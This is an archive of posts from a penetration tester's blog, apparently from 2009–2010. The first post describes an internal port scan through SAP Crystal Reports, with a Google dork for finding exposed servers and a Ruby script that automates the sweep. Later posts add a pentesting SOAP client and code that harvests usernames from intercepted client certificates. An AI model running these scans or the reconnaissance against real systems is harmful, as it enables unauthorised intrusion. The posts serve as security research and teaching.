Internal Port Scanning via Crystal Reports

December 2, 2010

Another fun attack that willis and I found during our SAP BusinessObjects research is that we could perform internal port scanning using Crystal Reports.

The way this works is that when you browse to a Crystal Reports web application (http://hostname/CrystalReports/viewrpt.cwr), there are a few parameters which are used to communicate with the SAP services on the backend. The problem is that these parameters are controlled by the user. A better design would be to provide a drop-down list, or to have all of the configuration handled by the server.

This means the user can modify the IP and port which the web application communicates with on the backend (port 6400 by default). With control of the IP and port in hand, the next step is to map the responses to open and closed states so that we can programmatically map out the internal network.

Here are a few nice Google Dorks:
filetype:cwr inurl:apstoken

Here is the resulting mapping:


Port Open Response:
# Unable to open a socket to talk to CMS $HOSTNAME:445 (FWM 01005)


Port Closed Response:
# Server $HOSTNAME:80 not found or server may be down (FWM 01003)

Lastly, the only thing we need to do is modify the IP and port to whatever we are trying to scan. This is faster than using BeEF’s JavaScript internal port-scanning functionality, and it doesn’t require client interaction. Pwn dem v0hns!
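To automate the sweep, the response mapping above can be wrapped in a small script. Here is a rough sketch in Ruby; the viewer hostname, the target IP, and the parameter carrying the CMS host:port (assumed here to be called `aps`) are placeholders that will vary between BusinessObjects deployments.

```ruby
require 'net/http'
require 'uri'

# Map the FWM error codes in the viewer's response to a port state,
# following the mapping above: FWM 01005 => open, FWM 01003 => closed.
def classify(body)
  if body.include?('FWM 01005')
    :open
  elsif body.include?('FWM 01003')
    :closed
  else
    :unknown
  end
end

# Ask the Crystal Reports viewer to connect to target:port and classify
# the result. The 'aps' parameter name is an assumption; check the
# parameters your target's viewrpt.cwr actually accepts.
def probe(viewer_host, target, port)
  uri = URI("http://#{viewer_host}/CrystalReports/viewrpt.cwr?aps=#{target}:#{port}")
  classify(Net::HTTP.get(uri))
end

# Example sweep of a few common ports on a hypothetical internal host:
# [22, 80, 443, 445, 3389, 6400].each do |port|
#   puts "10.0.0.5:#{port} => #{probe('reports.example.com', '10.0.0.5', port)}"
# end
```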




Security-patching Common Web Development Frameworks

November 22, 2010

A few weeks ago at OWASP AppSec DC we made progress on an idea that several of us (@RafalLos, @secureideas, @securityninja, @TheCustOS) have been talking about on Twitter for a while. The idea is based on trying to find a good solution to what we see as the general brokenness of the Internet’s web applications. Not only do we see current applications as badly broken, but the velocity at which developers are building new insecure web applications is increasing. The panel that we hosted at OWASP AppSec DC discussed one method by which we can help reduce the rate at which new, insecure web applications are being developed.

Our idea is based on improving the security of existing web application development frameworks; adding security components into their core, thus making security more transparent to the developer and potentially having the effect of producing more secure web applications.

While there are certain elements of WebAppSec, such as training, which will help to reduce the volume and impact of vulnerabilities, training simply hasn’t proven to be a solution which scales well. The root of the problem is that the number of developers in the world is many orders of magnitude larger than the number of WebAppSec trainers. The trainers are also limited by several factors, such as the need to understand language-specific constructs and limitations and the need to constantly keep up with changing development methodologies. This drastically shrinks the pool of qualified, available trainers.

There are two factors which we need to address so that everyone is clear on the types of vulnerabilities we want to cover and how we will improve existing frameworks. Trying to fix all WebAppSec vulnerabilities programmatically is an arduous and complex task. Therefore, we have decided to focus on form-based attacks (SQLi, XSS, etc.). Our approach will focus strictly on the types of flaws which can be readily addressed with minimal impact to the structure and coding principles of the framework.

Next, we have to cover which frameworks, and which versions, we will try to improve. From the panel discussion, the consensus is that we should not focus on adding security to legacy versions of the frameworks. That would be a losing battle which isn’t worth fighting, since developers will, over time, likely move to newer versions of the frameworks with the applied fixes.

The core idea is to improve existing development frameworks by adding security controls into the upstream version of the framework. This means that as the framework is improved with additional features which developers will want, they will have the added benefit of getting a more secure framework “right out of the box”. We understand that developers have little incentive to produce more secure code when it competes with their often aggressive release deadlines.

Making the frameworks incorporate security is very important, and I think the ideal way to reduce the rate at which vulnerable web applications are being developed is by making it more difficult for developers to write insecure code. From a business perspective, this change reduces the time and productivity cost of writing “more secure code”. Our goal is to make the applications being developed more secure by making security less visible and requiring less effort. We feel this will be the most effective and impactful method of raising overall web application security: making it simple and (nearly) transparent for developers. We know developers don’t write poorly secured code on purpose, so by making security easier on them, there is a greater chance of the final product having a higher level of software security. It may not be possible to make the entire Internet secure, but if we can change the velocity at which new, vulnerable web applications are being developed, then we are really making huge strides toward a more secure Internet.

Perhaps the most important question, now that we have acceptance of the idea, is: what do we do first? Clearly, step one is gaining community support. I’m not 100% sure that creating a new OWASP project is the best method. The alternative is to use something like Google Groups, or a similar site, for managing our efforts.

We welcome community input! Please feel free to leave comments. We are looking forward to seeing what other people in the community have to say about these ideas.

Pentesting Web Services

November 21, 2010

Recently, I have been doing a few presentations with Will Vandevanter (@willis__) on Hacking SAP BusinessObjects. For anyone who hasn’t seen the presentation, I thought it would be useful to do a few follow-up blog posts clarifying a few topics in greater detail.

The essence of the presentation was focused on pentesting SAP’s Service Oriented Architecture (SOA). There are two common ways to do SOA (SOAP and REST); the method used by SAP BusinessObjects is SOAP. For anyone that isn’t familiar with SOAP, just think of XML messages on top of HTTP. Below is a simple Ruby client that makes a SOAP request to the web service. There are a few things which make this sample very useful to anyone performing a penetration test. The first is that the request and response are stored in txt files, which is useful for logging and manual review of details. The second is that the request is made using a local proxy on 8080/tcp (BurpSuite, WebScarab, etc.).

By using a proxy, the pentester can have fine-grained control over the request. Even though BurpSuite doesn’t have built-in web services support, pentesters can still use the proxy to intercept requests since it’s just HTTP. The way this works is to intercept a SOAP request, then use the intruder to fuzz any parameters in the web service. Pentesters also use BurpSuite (or whatever proxy) to replay requests and to perform PRNG testing (similar to session ID testing).

Sample Ruby SOAP client
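A minimal sketch of such a client, using only Ruby’s standard library, is shown below. The endpoint URL, SOAPAction, and envelope body are placeholders to be replaced with the target service’s actual values; the request is routed through a local intercepting proxy on 127.0.0.1:8080, and the raw request/response are written to txt files for logging and manual review.

```ruby
require 'net/http'
require 'uri'

# Wrap a service-specific body in a bare SOAP 1.1 envelope.
def build_envelope(body_xml)
  <<~XML
    <?xml version="1.0" encoding="UTF-8"?>
    <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
      <soapenv:Body>
        #{body_xml}
      </soapenv:Body>
    </soapenv:Envelope>
  XML
end

# POST the envelope through a local proxy (BurpSuite, WebScarab, etc.)
# and log the raw request/response to txt files.
def soap_request(endpoint_url, envelope, proxy_host: '127.0.0.1', proxy_port: 8080)
  endpoint = URI(endpoint_url)
  http = Net::HTTP.new(endpoint.host, endpoint.port, proxy_host, proxy_port)
  request = Net::HTTP::Post.new(endpoint.request_uri,
                                'Content-Type' => 'text/xml; charset=UTF-8',
                                'SOAPAction'   => '""')
  request.body = envelope
  File.write('request.txt', envelope)   # log the outgoing request
  response = http.request(request)
  File.write('response.txt', response.body) # log the raw response
  response
end

# Example (hypothetical endpoint):
# soap_request('http://target.example.com/dswsbobje/services/Session',
#              build_envelope('<login/>'))
```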

Let me know what you think. What methods are you using to pentest web services? What tools do you use? Comments welcome!

Hack the Planet!


Sans Pentest Summit 2010 – Goal Oriented Pentesting

August 4, 2010

Back in June, I was in Baltimore for the SANS Pentest Summit 2010. I really enjoyed this conference, since it provided the opportunity to chat with many people who are working on ways to improve the penetration testing process. At the conference, I presented the Goal Oriented Pentesting theory that I have been talking about for a while (first post, second post). The talk expanded upon the original theories by incorporating specific methods which provide criteria for anyone looking to implement Goal Oriented Pentesting in their security assessments. I also included examples from several security assessments that I have performed (external pentest, internal pentest, and web app audit) so that attendees would be able to use these goals as a guide in the future.

The slides from the talk can be found here.

What else should be done to improve upon this? Let me know what you think!

OWASP AppSec 09 – Synergy! A world where the tools communicate

November 3, 2009

On November 12th, I will be giving a talk at the annual OWASP AppSec conference titled “Synergy! A world where the tools communicate”. I am really excited to give this talk since I have been working on the content for almost 2 years. If you have attended any of my talks in the past, like BlackHat/DefCon, ShmooCon, and/or InfoSec World, you already know that I will bring tons of fresh code! I can’t wait for OWASP AppSec 09.

Brace yourself. We are gonna raise the bar on the industry.


Burpsuite::Parser 0.01

October 15, 2009

Just to get everyone excited for my talk, “Synergy! A world where the tools communicate” at OWASP NYC today, I decided to release Burpsuite::Parser 0.01 a little early.

Here is an example of using the module:

use Burpsuite::Parser;

my $bpx = new Burpsuite::Parser;
my $parser = $bpx->parse_file('burpsuite.xml');
# a Burpsuite::Parser Object
my @results = $parser->get_all_issues();
# an Array of Burpsuite::Parser::Issue Objects
foreach my $h ( @results ) {
     print "Severity: " . $h->severity . "\n";
     print "Host: " . $h->host . "\n";
     print "Name: " . $h->name . "\n";
     print "Path: " . $h->path . "\n";
     print "Proof of Concept:\n " . $h->issue_detail . "\n";
}

Version 0.01 of the module can be found at

One good thing to note: all of the requests/responses are automatically included in the XML. To reduce the size of the XML, it may be helpful to generate an XML file without them. This will make parsing faster.


Client-Side Certs – Oh my!

October 12, 2009

One of the techniques demonstrated during the BlackHat/DefCon talk I gave with RSnake was utilizing client-side certificates. Client-side certificates allow a server to gain a certain amount of trust in the client that is connecting to it. They are used by companies that don’t want to worry about deploying tokens, relying on client-side certificates instead. Client-side certificates are also used by several SSL VPN devices.

To demonstrate client-side certificates, I first needed to create a few certificates so the client could connect to the server.

Using openssl, I created the certificate:
openssl req \
-x509 -nodes -days 365 \
-newkey rsa:1024 -keyout mycert.pem -out mycert.pem

Next, I needed to set up the server to use the certificate. I started thinking about the easiest way to accomplish this goal. It occurred to me that instead of using Apache, I should use the built-in webserver in openssl. This made setup easier, since I replaced Apache with a single command.

Here is an example:
openssl s_server -accept 443 -cert mycert.pem -www -verify 10

Finally, I set up a client and verified that the browser contained a client-side certificate for ANOTHER server. Therefore, there is no trust relationship between the public key within the client’s browser and the openssl server. The key point is that the browser will ask to send the public key every time! The only thing an attacker needs to do is listen on the wire and intercept the public key.

Now you may ask, “who cares about the information in a public key?” Well, client-side certificates can contain the following information:

  • Email Address (perhaps a valid username)
  • Hostname and maybe OS of the server
  • Date the Certificate was Issued
  • Date the Certificate Expires

Sometimes, the email address contains the user’s name. Many organizations standardize on a common schema to construct email addresses; for example, they may use some variation of the first and last name of the employee:


  • [firstname].[lastname]
  • [firstname]-[lastname]
  • [firstname]_[lastname]

If this is the case, an attacker can extract this information and now knows the user’s full name. For the purposes of achieving remote access, it is only a piece of the puzzle.
The next piece of information is the date the certificate expires. Since we know a valid email address, it is possible that it is also a valid username for network-based attacks. Putting the username and dates together means that the attacker has a greater likelihood of performing a successful attack.
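As a sketch of how this extraction could be automated, the following Ruby uses the standard OpenSSL bindings to pull the interesting fields out of an intercepted certificate and to generate username guesses from the email address, based on the schemas listed above. The field names (`emailAddress`, `CN`) are standard X.509 subject attributes; everything else is illustrative.

```ruby
require 'openssl'

# Pull the reconnaissance-relevant fields out of a client-side
# certificate supplied as PEM text.
def cert_intel(pem)
  cert  = OpenSSL::X509::Certificate.new(pem)
  attrs = cert.subject.to_a.to_h { |name, value, _type| [name, value] }
  {
    email:       attrs['emailAddress'], # perhaps a valid username
    common_name: attrs['CN'],           # often a hostname
    issued:      cert.not_before,       # date the certificate was issued
    expires:     cert.not_after         # date the certificate expires
  }
end

# Turn an address like john.smith@example.com into the common
# first/last-name username variants.
def username_guesses(email)
  local = email.split('@').first
  first, last = local.split(/[._-]/, 2)
  return [local] unless last
  ["#{first}.#{last}", "#{first}-#{last}", "#{first}_#{last}"]
end
```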

OWASP NYC – Raising the bar on Pentesting!

October 11, 2009

I will be giving a talk at OWASP NYC/NJ this coming Thursday (October 15, 2009). The talk is heavily focused on improving the penetration testing process. It is important for the tools used during a penetration assessment to communicate, because it allows the assessment to streamline many of the tasks that have been manual in the past. The goal of this presentation is to discuss the need for communication between security tools and to demonstrate several examples in which integration can reduce the amount of time spent manually correlating information. This will improve the penetration testing process! If you were to perform an assessment manually (i.e., without any tools communicating) and compare the results to an assessment in which all the tools were communicating, the results would clearly demonstrate that communication between tools leads to a better assessment. Therefore, all security assessments need to move in this direction.

For this presentation, I will be demonstrating several modules that I have been working on to provide communication abilities to many of the most popular security testing tools for pentesting and web application security assessments. This presentation will be filled with tons of new tools and modules that I will be releasing for the first time. Many of these tools will make pentesting easier and help to automate much of the tedious tasks of security testing.

I look forward to hanging out with people after the talk and getting their feedback on ways to improve the functionality that I have built.


CSI – Web Application Panel

September 18, 2009

I have been asked by Rafal Los (a good friend of mine) to join him on a panel at CSI in October to discuss the current state and future of Web Application Security. I’m really excited for the panel, and it will be fun to catch up with many people who didn’t make it to BlackHat and DefCon.

Here is the information on the presentation:

Title: Web Summit
Date/Time: Monday (October 26, 2009) 2:00pm — 5:30pm
Topic: Web 2.0

An informed host and select group of expert speakers tackle web issues. After brief presentations, debates and open forums, you’ll more fully understand the issues and solutions, and have the insight that will guide you to better, more confident decisions regarding those complex and challenging issues.

Morphing more business functions into Web 2.0 applications offers both irresistible business opportunities and undeniable security threats. Criminals are using the Web as an attack vector and crafting more sophisticated, exceptionally targeted attacks. Yet who needs to exploit vulnerabilities when there are plenty of malicious ways to use legitimate applications, like social networking sites and microblogs. And what about the browser? A browser is in a position to both protect the local device from Web-borne threats and thwart attacks that take place solely within the Web—but are current browsers proactively shouldering their security responsibilities? Learn how to both secure your organization’s own Web site and protect your sensitive data from attacks launched from other vulnerable Web sites. Get to know the Web-based threats of today and tomorrow, and explore what next-generation security tools could live up to the promise of revolutionizing Internet security.

I. Web application vulnerabilities and attacks
II. Browser attacks
III. Mitigating Web security threats and next-gen solutions

"Unmasking You!" at BlackHat 09 and DefCon 17

August 7, 2009

Last week, I gave a presentation with Robert “RSnake” Hansen called “Unmasking You!” at BlackHat 09 and DefCon 17.

The slides and demos can be found at:

Originally, we were only scheduled to speak at DefCon, but due to a last minute change we spoke at both venues. The backstory of how that occurred is kind of funny, so I figured I would share it with everyone who hasn’t heard it yet.

On July 26th, I decided to go out on a twilight fishing boat after a week-long engagement in LA. We weren’t really having much luck catching fish; a few missed opportunities, but no fish. As the sun began to set over the harbor, my expectations shifted to enjoying the evening and the week ahead in Las Vegas at BlackHat and DefCon. Around 10:30 or so, I got a call from RSnake, and he said, “There has been a scheduling change, would you like to give the talk at BlackHat?” That was the only moment in my life that I was happy I didn’t have a fish on my line. I gladly accepted the invitation and knew that the next 48 hours would be interesting, since I still needed to record many of my demos. Once I arrived in Vegas, I spent the majority of the time preparing all of the demos and getting things ready. The end result was around 9 recorded demos and 2 presentations.

Our presentations went really well and everyone had great comments and feedback. I had an amazing time hanging out with tons of friends who I only see once a year. I also had a chance to meet Wade Alcorn (the author of BeEF). BeEF, for those who have not used it, is a browser exploitation framework that is very useful when performing penetration assessments. For the talks, I wrote all of my code, and ported several of RSnake’s scripts, as BeEF modules, which will be included in the next release (should be out in a few weeks). All of the demos demonstrated methods that attackers can use to determine information about the victim’s machine.

I hope everyone enjoyed the talk and I look forward to seeing everyone again next year in Vegas!